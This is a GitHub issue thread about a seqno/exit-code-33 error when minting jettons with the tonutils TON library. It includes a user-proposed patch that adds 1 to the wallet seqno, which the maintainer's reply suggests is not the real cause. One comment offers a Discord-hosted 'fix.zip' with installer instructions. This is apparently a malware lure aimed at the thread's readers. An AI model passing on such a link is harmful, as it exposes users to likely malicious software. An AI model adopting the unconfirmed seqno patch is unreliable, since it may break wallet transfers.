### ISSUE TITLE
seqno error

### ISSUE THREAD

**Issue by klishinoleg** [nessshon/tonutils#3]
on jetton mint function

aiohttp.client_exceptions.ClientResponseError: 406, message='error code: 0 message: cannot apply external message to current state : External message was not accepted\nCannot run message on account: inbound external message rejected by transaction BD9CB4F0F6B64AA9934BB38D953CAA74EC8F284CB632E78B2D02AD4D235F0FC5:\nexitcode=33, steps=23, gas_used=0\nVM Log (truncated):\n...te NOW\nexecute LEQ\nexecute THROWIF 36\nexecute PUSH c4\nexecute CTOS\nexecute LDU 32\nexecute LDU 32\nexecute LDU 256\nexecute LDDICT\nexecute ENDS\nexecute XCPU s4,s3\nexecute EQUAL\nexecute THROWIFNOT 33\ndefault exception handler, terminating vm with exit code 33\n', url=URL('https://testnet.tonapi.io/v2/blockchain/message')

\wallet\contract\_base.py

FIX:

`    async def raw_transfer(
            self,
            messages: Optional[List[WalletMessage]] = None,
            **kwargs,
    ) -> str:
        """
        Perform a raw transfer operation.

        :param messages: The list of wallet messages to transfer.
        :return: The hash of the transfer message.
        """
        if messages is None:
            messages = []

        seqno = kwargs.get("seqno", None)

        if seqno is None:
            **kwargs["seqno"] = (await self.get_seqno(self.client, self.address)) + 1**

        body = self.raw_create_transfer_msg(
            private_key=self.private_key,
            messages=messages or [],
            **kwargs,
        )

        message = self.create_external_msg(dest=self.address, body=body)
        message_boc_hex, message_hash = message_to_boc_hex(message)
        await self.client.send_message(message_boc_hex)

        return message_hash`

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by nessshon** [comment]
@klishinoleg The tonapi testnet is currently experiencing issues. Please try again later, or switch to using ToncenterClient as your provider.
